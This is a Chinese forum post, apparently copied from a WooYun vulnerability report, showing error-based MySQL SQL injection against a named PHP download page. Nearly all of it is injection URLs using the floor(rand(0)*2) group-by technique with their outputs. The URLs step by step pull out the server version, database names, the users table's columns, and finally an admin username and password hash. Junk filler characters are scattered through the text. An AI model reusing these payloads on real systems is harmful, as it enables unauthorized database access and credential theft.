php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
3 f  X% @# m& E! u( V  v
' ]6 `* F/ n, A: B( V之前想找个测试 没想到这有 可以测试下做个记录而已
. f5 \- o$ [3 X( s
/ S) Q0 X0 F! Lhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
! _% ~- K8 @& e8 N
# d) B! O: ?' v" r+ |& d3 d( s/data0/htdocs/leqi_new/app/myapp.php

或者

/**********version()**********/ 5.1.49-log
, A8 P1 b; [9 ?9 k* @- g+ F. Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ s3 y5 c: h9 h- P
/**********user()**********/  
# ]. f% F7 {( Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

8 P7 u6 U; X( G* Y/**********database()**********/  leqi
+ d0 o6 D  `4 p) g2 P2 |- _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 q: j4 x& s% V. \
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
: C0 ~. a; E+ o- t8 jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
6 b$ V4 e! I' h# Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. U0 @2 Z9 r- \7 a) U3 Utest

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) `1 B( \0 T7 ]8 h; \4 h4 \users
! X1 N; z, m+ T; _4 V1 R7 Z  W
/**********limit依次递归爆字段名**********/
. ]8 d0 m0 v7 v) V+ n* |' `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
$ i" ?$ m+ u) K' Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
( T* O2 U; `: Q11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- n. t' z( d& R% e/ V. ^/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
( a* `$ T2 h0 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 H+ W) b9 [$ h0 F6a8b4574ca231eb8bd52764d4978ffcd
5 O# G$ v* H1 }. ?
' `8 N  X1 ]$ w& A+ i